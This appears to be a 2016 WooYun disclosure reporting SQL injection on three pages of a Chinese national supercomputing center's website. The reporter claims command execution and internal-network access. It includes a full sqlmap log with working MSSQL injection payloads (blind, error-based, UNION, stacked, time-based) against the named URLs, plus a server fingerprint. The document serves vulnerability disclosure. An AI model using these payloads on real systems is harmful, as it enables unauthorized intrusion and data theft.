当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170428

漏洞标题:国家超级计算机某中心存在多处漏洞(可getshell)

相关厂商:hnu.cn;www.hnu.edu.cn

漏洞作者: crown丶prince

提交时间:2016-01-17 10:08

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

国家超级计算机某中心存在多处漏洞(可getshell)(可内网漫游)

详细说明:

国家超级计算沙中心2010年10月由科技部批准组建,成为继天津和深圳之后获批建设的第三家国家级超级计算中心。 2010年11月28日,以“天河一号”为计算设备的国家超级计算长沙中心在湖南大学正式奠基 。2014年11月04日,国家超级计算长沙中心在湖南大学正式运营。“国家超级计算长沙中心”是经科技部批准的信息化建设重大项目。国家超级计算长沙中心选址湖南大学校区内,采用国防科技大学“天河一号”高性能计算机,按每秒1000万亿次运算能力规划建设,总投资7.2亿元。
偶然浏览到国家超级计算机长沙中心 http://nscc.hnu.edu.cn/
检测之:
http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13
http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14
http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4
三处存在SQL注入
【1】sqlmap截图:

1.png


【2】DBA权限直接可以执行命令,服务器在内网

2.png


3.png


【3】数据库信息:

4.png


疑似项目信息数据库

5.png


未深入

漏洞证明:

sqlmap全过程

[18:09:00] [INFO] testing connection to the target URL
[18:09:01] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[18:09:02] [INFO] target URL is stable
[18:09:02] [INFO] testing if GET parameter 'id' is dynamic
[18:09:02] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:03] [INFO] GET parameter 'id' is dynamic
[18:09:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'Microsoft SQL Server')
[18:09:03] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n]
[18:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:31] [WARNING] reflective value(s) found and filtering out
[18:09:32] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[18:09:32] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-b
ased - WHERE or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:09:33] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase inline quer
ies' injectable
[18:09:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:09:33] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................
[18:09:48] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase st
acked queries' injectable
[18:09:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:09:59] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase ti
me-based blind' injectable
[18:09:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:09:59] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[18:10:04] [INFO] target URL appears to be UNION injectable with 11 columns
[18:10:06] [WARNING] combined UNION/error-based SQL injection case found on colu
mn 2. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on colu
mn 1. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on colu
mn 11. sqlmap will try to find another column with better characteristics
[18:10:08] [WARNING] combined UNION/error-based SQL injection case found on colu
mn 9. sqlmap will try to find another column with better characteristics
[18:10:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N]
sqlmap identified the following injection points with a total of 66 HTTP(s) requ
ests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=14  AND 5278=5278
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=14  AND 2616=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+C
HAR(112)+CHAR(113)+(SELECT (CASE WHEN (2616=2616) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=14  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHA
R(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(65)+CHAR(102)+CHAR(
99)+CHAR(108)+CHAR(104)+CHAR(80)+CHAR(110)+CHAR(74)+CHAR(112)+CHAR(113)+CHAR(98)
+CHAR(113)+CHAR(112)+CHAR(113),NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=14 ; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=14  WAITFOR DELAY '0:0:5'--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELEC
T (CASE WHEN (3942=3942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CH
AR(113)+CHAR(112)+CHAR(113))
---
[18:10:23] [INFO] testing Microsoft SQL Server
[18:10:24] [INFO] confirming Microsoft SQL Server
[18:10:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

修复方案:

版权声明:转载请注明来源 crown丶prince@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-18 09:02

厂商回复:

确认并尽快修复

最新状态:

暂无